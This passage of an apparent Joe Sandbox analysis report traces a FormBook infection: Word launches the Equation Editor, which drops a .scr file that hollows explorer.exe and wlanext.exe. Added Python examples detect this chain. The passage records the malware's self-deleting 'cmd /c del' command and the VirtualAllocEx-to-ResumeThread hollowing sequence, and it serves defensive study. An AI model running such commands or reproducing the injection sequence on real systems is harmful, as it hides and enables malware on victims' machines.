                                                                              Start time:09:13:55
                                                                              Start date:25/06/2024
                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                              Imagebase:0x400000
                                                                              File size:543'304 bytes
                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:09:13:57
                                                                              Start date:25/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\nelb82019.scr
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\nelb82019.scr"
                                                                              Imagebase:0xc30000
                                                                              File size:628'736 bytes
                                                                              MD5 hash:607868824F841FF4B6E24E997228D10D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 0000000A.00000002.402124623.0000000000860000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 37%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:09:13:57
                                                                              Start date:25/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\nelb82019.scr
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\nelb82019.scr"
                                                                              Imagebase:0xc30000
                                                                              File size:628'736 bytes
                                                                              MD5 hash:607868824F841FF4B6E24E997228D10D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:09:13:58
                                                                              Start date:25/06/2024
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0xff2f0000
                                                                              File size:3'229'696 bytes
                                                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false
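
The Target entries in this section describe the chain WINWORD.EXE (ID 0) → EQNEDT32.EXE (ID 9) → nelb82019.scr (IDs 10 and 11) → explorer.exe (ID 13, injected) → wlanext.exe (ID 14). The following is an added example, not part of the Joe Sandbox report and not a Sigma rule: it rebuilds those entries as process-creation events and runs three detection rules over them, the third being a time-window correlation. Parent links marked ASSUMED are this example's reconstruction; the report itself states only that the Equation Editor started processes and that explorer.exe was injected. Rule names and thresholds are this example's own.

```python
"""Process-chain detection over the report's Target table (added example, not report code)."""
import ntpath
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional


def at(hms: str) -> datetime:
    """Start time in the report's own format: date 25/06/2024, time HH:MM:SS."""
    return datetime.strptime(f"25/06/2024 {hms}", "%d/%m/%Y %H:%M:%S")


@dataclass(frozen=True)
class ProcEvent:
    target_id: int
    started: datetime
    image: str
    cmdline: str
    parent_image: Optional[str]  # None where the report does not show a parent


WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPED = r"C:\Users\user\AppData\Roaming\nelb82019.scr"
EXPLORER = r"C:\Windows\explorer.exe"
WLANEXT = r"C:\Windows\SysWOW64\wlanext.exe"

# Constructed from the Target entries above. Parents marked ASSUMED are not stated by the report.
EVENTS: List[ProcEvent] = [
    ProcEvent(0, at("09:13:38"), WINWORD, f'"{WINWORD}" /Automation -Embedding', None),
    ProcEvent(9, at("09:13:55"), EQNEDT, f'"{EQNEDT}" -Embedding', None),      # COM-activated, parent not shown
    ProcEvent(10, at("09:13:57"), DROPPED, f'"{DROPPED}"', EQNEDT),            # report: equation editor starts processes
    ProcEvent(11, at("09:13:57"), DROPPED, f'"{DROPPED}"', DROPPED),           # ASSUMED: second copy for hollowing
    ProcEvent(13, at("09:13:58"), EXPLORER, r"C:\Windows\Explorer.EXE", None),
    ProcEvent(14, at("09:14:00"), WLANEXT, f'"{WLANEXT}"', EXPLORER),          # ASSUMED: launched from injected explorer
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")
ODD_EXTENSIONS = {".scr", ".pif", ".com"}


def _name(path: Optional[str]) -> str:
    return ntpath.basename(path or "").lower()


def rule_office_child(ev: ProcEvent) -> bool:
    """Child of Word/Excel/PowerPoint or the Equation Editor; these rarely have a reason to spawn executables."""
    return _name(ev.parent_image) in OFFICE_PARENTS


def rule_profile_executable(ev: ProcEvent) -> bool:
    """PE with a non-.exe extension launched from a user-writable directory."""
    low = ev.image.lower()
    return any(d in low for d in USER_WRITABLE) and ntpath.splitext(low)[1] in ODD_EXTENSIONS


def rule_syswow64_after_untrusted(ev: ProcEvent, events: List[ProcEvent],
                                  window: timedelta = timedelta(seconds=10)) -> bool:
    """32-bit system binary started by explorer.exe within `window` after a profile-executable hit.
    Matches the hand-off seen here: dropped .scr -> injected explorer.exe -> SysWOW64 host process."""
    if not ev.image.lower().startswith("c:\\windows\\syswow64\\") or _name(ev.parent_image) != "explorer.exe":
        return False
    return any(rule_profile_executable(e) and timedelta(0) <= ev.started - e.started <= window
               for e in events)


def detect(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map target_id -> names of the rules that fired for it."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        fired = []
        if rule_office_child(ev):
            fired.append("office_child")
        if rule_profile_executable(ev):
            fired.append("profile_executable")
        if rule_syswow64_after_untrusted(ev, events):
            fired.append("syswow64_after_untrusted")
        if fired:
            hits[ev.target_id] = fired
    return hits


if __name__ == "__main__":
    for target_id, rules in detect(EVENTS).items():
        print(f"Target {target_id}: {', '.join(rules)}")
```

The first two rules fire on ID 10 alone and are enough to stop the chain at the drop; the third exists for the case where the dropper is missed and only the later explorer.exe → wlanext.exe hand-off is visible. With real telemetry (Sysmon Event ID 1, EDR process events) the parent image is recorded rather than assumed, so the rules need no reconstruction step.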

                                                                              Target ID:14
                                                                              Start time:09:14:00
                                                                              Start date:25/06/2024
                                                                              Path:C:\Windows\SysWOW64\wlanext.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\wlanext.exe"
                                                                              Imagebase:0xc00000
                                                                              File size:77'312 bytes
                                                                              MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:16
                                                                              Start time:09:14:03
                                                                              Start date:25/06/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del "C:\Users\user\AppData\Roaming\nelb82019.scr"
                                                                              Imagebase:0x4a1f0000
                                                                              File size:302'592 bytes
                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:35.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:25.5%
                                                                                Total number of Nodes:47
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 4194 2425e0 4196 2425e5 4194->4196 4197 24260a 4196->4197 4198 244fe3 CreateProcessW 4196->4198 4199 244ffe 4198->4199 4200 244228 4201 244242 4200->4201 4202 244292 4201->4202 4204 2442da 4201->4204 4205 24431b 4204->4205 4224 244012 4205->4224 4228 244018 4205->4228 4206 2447e9 4232 243eb8 4206->4232 4236 243ec0 4206->4236 4207 244ac8 4218 243ec0 WriteProcessMemory 4207->4218 4219 243eb8 WriteProcessMemory 4207->4219 4208 2448cd 4208->4207 4216 243ec0 WriteProcessMemory 4208->4216 4217 243eb8 WriteProcessMemory 4208->4217 4209 244b06 4210 244bee 4209->4210 4240 243d98 4209->4240 4244 243d90 4209->4244 4248 244130 4210->4248 4252 244138 4210->4252 4211 244cab 4211->4201 4216->4208 4217->4208 4218->4209 4219->4209 4225 24400f 4224->4225 4225->4224 4226 244095 VirtualAllocEx 4225->4226 4227 2440d4 4226->4227 4227->4206 4229 24405c VirtualAllocEx 4228->4229 4231 2440d4 4229->4231 4231->4206 4233 243ec0 WriteProcessMemory 4232->4233 4235 243fa5 4233->4235 4235->4208 4237 243f0c WriteProcessMemory 4236->4237 4239 243fa5 4237->4239 4239->4208 4241 243de1 Wow64SetThreadContext 4240->4241 4243 243e59 4241->4243 4243->4210 4245 243d98 Wow64SetThreadContext 4244->4245 4247 243e59 4245->4247 4247->4210 4249 244138 ResumeThread 4248->4249 4251 2441c8 4249->4251 4251->4211 4253 24417c ResumeThread 4252->4253 4255 2441c8 4253->4255 4255->4211 4256 245248 ReadProcessMemory 4257 245307 4256->4257
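The execution_graph line above is a flat token stream: a decimal node id followed by a hex address and any API names resolved at that node, plus `a->b` edges. Read by hand it shows the remote-write chain VirtualAllocEx -> WriteProcessMemory -> Wow64SetThreadContext -> ResumeThread reachable from the 0x244228 root, with CreateProcessW and ReadProcessMemory on separate components. The parser below is an added example, not Joe Sandbox code and not part of this report; it recovers that chain mechanically. The token grammar it assumes (node = "id addr [Api]*", edge = "id->id") is inferred from the dump, not a documented Joe Sandbox format, and the embedded input is an excerpt of this report's execution_graph line with one branch kept wherever the graph has two equivalent paths.

```python
"""Parse a Joe Sandbox execution_graph token dump and check whether a
process-hollowing style remote-write chain is reachable, in order, from a
graph root. Grammar is inferred from the dump (assumption, not documented)."""
from collections import defaultdict, deque

# Stage-by-stage API alternatives for the chain seen in this report.
# Wow64SetThreadContext and SetThreadContext are both accepted at stage 3.
HOLLOWING_CHAIN = (
    {"VirtualAllocEx"},
    {"WriteProcessMemory"},
    {"Wow64SetThreadContext", "SetThreadContext"},
    {"ResumeThread"},
)

# Constructed input: excerpt of this report's execution_graph line, one
# branch kept where the original has duplicated paths (layout unchanged).
SAMPLE_GRAPH = (
    "execution_graph 4194 2425e0 4196 2425e5 4194->4196 4197 24260a 4196->4197 "
    "4198 244fe3 CreateProcessW 4196->4198 4199 244ffe 4198->4199 "
    "4200 244228 4201 244242 4200->4201 4202 244292 4201->4202 "
    "4204 2442da 4201->4204 4205 24431b 4204->4205 4224 244012 4205->4224 "
    "4206 2447e9 4232 243eb8 4206->4232 4207 244ac8 "
    "4218 243ec0 WriteProcessMemory 4207->4218 4208 2448cd 4208->4207 "
    "4209 244b06 4210 244bee 4209->4210 4240 243d98 4209->4240 "
    "4248 244130 4210->4248 4211 244cab 4211->4201 4218->4209 "
    "4225 24400f 4224->4225 4225->4224 4226 244095 VirtualAllocEx 4225->4226 "
    "4227 2440d4 4226->4227 4227->4206 "
    "4233 243ec0 WriteProcessMemory 4232->4233 4235 243fa5 4233->4235 4235->4208 "
    "4241 243de1 Wow64SetThreadContext 4240->4241 4243 243e59 4241->4243 4243->4210 "
    "4249 244138 ResumeThread 4248->4249 4251 2441c8 4249->4251 4251->4211 "
    "4256 245248 ReadProcessMemory 4257 245307 4256->4257"
)


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> (hex address, [api names]),
    edges maps id -> [successor ids]. A decimal token starts a node and the
    next token is its address; bare words attach to the current node as API
    names; tokens containing '->' are edges."""
    nodes, edges = {}, defaultdict(list)
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    current, expect_addr = None, False
    for tok in tokens:
        if "->" in tok:
            src, dst = tok.split("->", 1)
            edges[int(src)].append(int(dst))
            expect_addr = False
        elif expect_addr:
            nodes[current] = (tok, [])
            expect_addr = False
        elif tok.isdigit():
            current, expect_addr = int(tok), True
        else:
            nodes[current][1].append(tok)
    return nodes, edges


def roots(nodes, edges):
    """Nodes with no incoming edge (entry points of each component)."""
    targets = {d for dsts in edges.values() for d in dsts}
    return sorted(n for n in nodes if n not in targets)


def apis_present(nodes):
    return sorted({api for _, apis in nodes.values() for api in apis})


def ordered_chain_from(nodes, edges, start, chain=HOLLOWING_CHAIN):
    """BFS over (node, stage) states. Returns [(address, api), ...] for the
    nodes that satisfied each stage in order, or None. Marking states rather
    than nodes as visited keeps the loops in the graph (e.g. 4211->4201)
    from causing infinite traversal while still allowing re-entry at a
    later stage."""
    seen, queue = set(), deque([(start, 0, [])])
    while queue:
        node, stage, hits = queue.popleft()
        if (node, stage) in seen:
            continue
        seen.add((node, stage))
        addr, apis = nodes.get(node, ("?", []))
        matched = chain[stage] & set(apis) if stage < len(chain) else set()
        if matched:
            hits = hits + [(addr, sorted(matched)[0])]
            stage += 1
            if stage == len(chain):
                return hits
        for nxt in edges.get(node, ()):
            queue.append((nxt, stage, hits))
    return None


def hollowing_report(text):
    """Summarise injection-relevant APIs and the first root whose reachable
    subgraph contains the full ordered chain."""
    nodes, edges = parse_execution_graph(text)
    for r in roots(nodes, edges):
        hits = ordered_chain_from(nodes, edges, r)
        if hits:
            return {"apis": apis_present(nodes), "chain_root": nodes[r][0], "chain": hits}
    return {"apis": apis_present(nodes), "chain_root": None, "chain": None}


if __name__ == "__main__":
    for key, value in hollowing_report(SAMPLE_GRAPH).items():
        print(key, value)
```

The ordered check matters more than the API set: a loader that merely imports these five functions is common, but a path that allocates in a remote process, writes to it, rewrites a thread context and then resumes the thread is the hollowing pattern itself, and that is what the report's separate CFG blocks for 243eb8/243ec0, 244012/244018, 243d90/243d98 and 244130/244138 below correspond to.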

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 854 2442da-244319 855 244320-2444a6 854->855 856 24431b 854->856 863 2444cd-244512 call 24370c 855->863 864 2444a8-2444cc 855->864 856->855 868 244514-244530 863->868 869 24453b-2445a5 863->869 864->863 868->869 875 2445a7 869->875 876 2445ac-2445d8 869->876 875->876 878 244639-24466b call 243724 876->878 879 2445da-24460c call 243718 876->879 886 244694 878->886 887 24466d-244689 878->887 884 244635-244637 879->884 885 24460e-24462a 879->885 888 244695-24469f 884->888 885->884 886->888 887->886 890 2446a6-2446ec call 243730 888->890 891 2446a1 888->891 897 244715-24472e 890->897 898 2446ee-24470a 890->898 891->890 899 244786-2447e4 897->899 900 244730-24475c call 24373c 897->900 898->897 978 2447e7 call 244012 899->978 979 2447e7 call 244018 899->979 905 244785 900->905 906 24475e-24477a 900->906 905->899 906->905 910 2447e9-2447fe 911 244800-244811 910->911 912 244813-244815 910->912 914 24481b-24482f 911->914 912->914 915 244831-24486b 914->915 916 24486c-244883 914->916 915->916 917 244885-2448a1 916->917 918 2448ac-2448c8 916->918 917->918 976 2448cb call 243ec0 918->976 977 2448cb call 243eb8 918->977 920 2448cd-2448ed 922 244916-24494b 920->922 923 2448ef-24490b 920->923 927 244aa3-244ac2 922->927 923->922 928 244950-2449d4 927->928 929 244ac8-244b01 927->929 938 244a98-244a9d 928->938 939 2449da-244a49 928->939 982 244b04 call 243ec0 929->982 983 244b04 call 243eb8 929->983 933 244b06-244b26 935 244b4f-244b82 933->935 936 244b28-244b44 933->936 942 244b84-244b8b 935->942 943 244b8c-244b9f 935->943 936->935 938->927 980 244a4c call 243ec0 939->980 981 244a4c call 243eb8 939->981 942->943 944 244ba6-244bd1 943->944 945 244ba1 943->945 950 244bd3-244be9 944->950 951 244c3b-244c6d call 243748 944->951 945->944 984 244bec call 243d90 950->984 985 244bec call 243d98 950->985 958 244c96 951->958 959 244c6f-244c8b 951->959 953 244a4e-244a6e 956 244a97 953->956 957 244a70-244a8c 953->957 955 244bee-244c0e 960 244c37-244c39 955->960 961 244c10-244c2c 955->961 956->938 957->956 962 244c97-244ca6 958->962 959->958 960->962 961->960 986 244ca9 call 244130 962->986 987 244ca9 call 244138 962->987 966 244cab-244ccb 969 244cf4-244dfd 966->969 970 244ccd-244ce9 966->970 970->969 976->920 977->920 978->910 979->910 980->953 981->953 982->933 983->933 984->955 985->955 986->966 987->966
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (
                                                                                • API String ID: 0-3887548279
                                                                                • Opcode ID: f7471c7a4b13c51bbdd65b43496de1e68742ee3401ce41beb4f8494f8f17412c
                                                                                • Instruction ID: 3e619b23876230c621f344f981a0b8fe940a82f9c8eb90d39b906d3051e791a7
                                                                                • Opcode Fuzzy Hash: f7471c7a4b13c51bbdd65b43496de1e68742ee3401ce41beb4f8494f8f17412c
                                                                                • Instruction Fuzzy Hash: 9452D274E01229CFDB68DF65C894BEDBBB2AF89301F1481EAD409A7295DB345E85CF40

                                                                                Control-flow Graph

                                                                                control_flow_graph 988 243eb8-243f2b 991 243f42-243fa3 WriteProcessMemory 988->991 992 243f2d-243f3f 988->992 994 243fa5-243fab 991->994 995 243fac-243ffe 991->995 992->991 994->995
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00243F93
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 9fb8be7a6ecc80ce2e9bc3139e86b1763b6d8b208cb63f7603247f4368fb08b3
                                                                                • Instruction ID: 2a2bb6e5248e3c6a7d32e5f3d6c9ad829defefce7dc08d5d720fbeab4c36a443
                                                                                • Opcode Fuzzy Hash: 9fb8be7a6ecc80ce2e9bc3139e86b1763b6d8b208cb63f7603247f4368fb08b3
                                                                                • Instruction Fuzzy Hash: 3C41A9B5D012589FCF00CFA9D984AEEFBF1BF49310F24942AE818B7210D335AA55CB64

                                                                                Control-flow Graph

                                                                                control_flow_graph 1000 243ec0-243f2b 1002 243f42-243fa3 WriteProcessMemory 1000->1002 1003 243f2d-243f3f 1000->1003 1005 243fa5-243fab 1002->1005 1006 243fac-243ffe 1002->1006 1003->1002 1005->1006
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00243F93
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 0fca5d2056329ff96ce8a86cb630010a0062b43d3b3f5fc912e00a9a919b2fba
                                                                                • Instruction ID: 25c76cb5a170cb4a8f9960edef3d6a5e8fe074ce8c36dd186e2e4f9afeaf966c
                                                                                • Opcode Fuzzy Hash: 0fca5d2056329ff96ce8a86cb630010a0062b43d3b3f5fc912e00a9a919b2fba
                                                                                • Instruction Fuzzy Hash: EA4199B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE818B7210D375AA55CB64

                                                                                Control-flow Graph

                                                                                control_flow_graph 1011 244012-244014 1012 244016-24408e 1011->1012 1013 24400f-244011 1011->1013 1016 244095-2440d2 VirtualAllocEx 1012->1016 1013->1011 1017 2440d4-2440da 1016->1017 1018 2440db-244125 1016->1018 1017->1018
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002440C2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 29424250f58d9a20c49b2b13d4c1e1baa6c76457e8c52a3324d6bc1925a683d5
                                                                                • Instruction ID: ca868e8fd97d7ccabf5fcab51263bbee658fda06a8f01569eab90c0c9774c0fa
                                                                                • Opcode Fuzzy Hash: 29424250f58d9a20c49b2b13d4c1e1baa6c76457e8c52a3324d6bc1925a683d5
                                                                                • Instruction Fuzzy Hash: FC41DAB4D002489FCF14CFA9D884AEEFBB1BF49310F10A42AE814B7210C375A955CF65

                                                                                Control-flow Graph

                                                                                control_flow_graph 1023 245242-245305 ReadProcessMemory 1025 245307-24530d 1023->1025 1026 24530e-24534c 1023->1026 1025->1026
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002452F5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: bf58c2a4950c41efb2c49b78e377a75bcffebb4a25ff9a3e4eeead075330da64
                                                                                • Instruction ID: 1a0d51f7ac521cce6f315de4107ddd7c5628ed867b2a40b0b27ab910636ce040
                                                                                • Opcode Fuzzy Hash: bf58c2a4950c41efb2c49b78e377a75bcffebb4a25ff9a3e4eeead075330da64
                                                                                • Instruction Fuzzy Hash: 274179B9D04258DFCF10CFAAD984ADEFBB1BB19310F14A06AE814B7210D375A945CF65

                                                                                Control-flow Graph

                                                                                control_flow_graph 1029 244018-2440d2 VirtualAllocEx 1032 2440d4-2440da 1029->1032 1033 2440db-244125 1029->1033 1032->1033
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002440C2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 9c46f715b3ae4d4e0c468abc3fd07133826fcbf00dcd0f13606f06b8c132f373
                                                                                • Instruction ID: 20129463231f5175487ad7af35b84c2fa07de90c5c3c350c3273a48b8da9696b
                                                                                • Opcode Fuzzy Hash: 9c46f715b3ae4d4e0c468abc3fd07133826fcbf00dcd0f13606f06b8c132f373
                                                                                • Instruction Fuzzy Hash: 5731A8B9D002489FCF14CFA9D984AEEFBB1BB49310F10A42AE814B7310D735A955CF64

                                                                                Control-flow Graph

                                                                                control_flow_graph 1038 245248-245305 ReadProcessMemory 1039 245307-24530d 1038->1039 1040 24530e-24534c 1038->1040 1039->1040
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002452F5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 8a4f24167624d70f67d802adcd4cfe8828246f66516b0c1adebe126dcb27d356
                                                                                • Instruction ID: 2808ac7c069fc34551705319e2359263ebf444ca0720849566b5e1e1713cc9c3
                                                                                • Opcode Fuzzy Hash: 8a4f24167624d70f67d802adcd4cfe8828246f66516b0c1adebe126dcb27d356
                                                                                • Instruction Fuzzy Hash: 433188B9D042589FCF10CFAAD984ADEFBB1BB19310F14A06AE814B7310D375A945CF64

                                                                                Control-flow Graph

                                                                                control_flow_graph 1043 243d90-243df8 1046 243e0f-243e57 Wow64SetThreadContext 1043->1046 1047 243dfa-243e0c 1043->1047 1049 243e60-243eac 1046->1049 1050 243e59-243e5f 1046->1050 1047->1046 1050->1049
                                                                                APIs
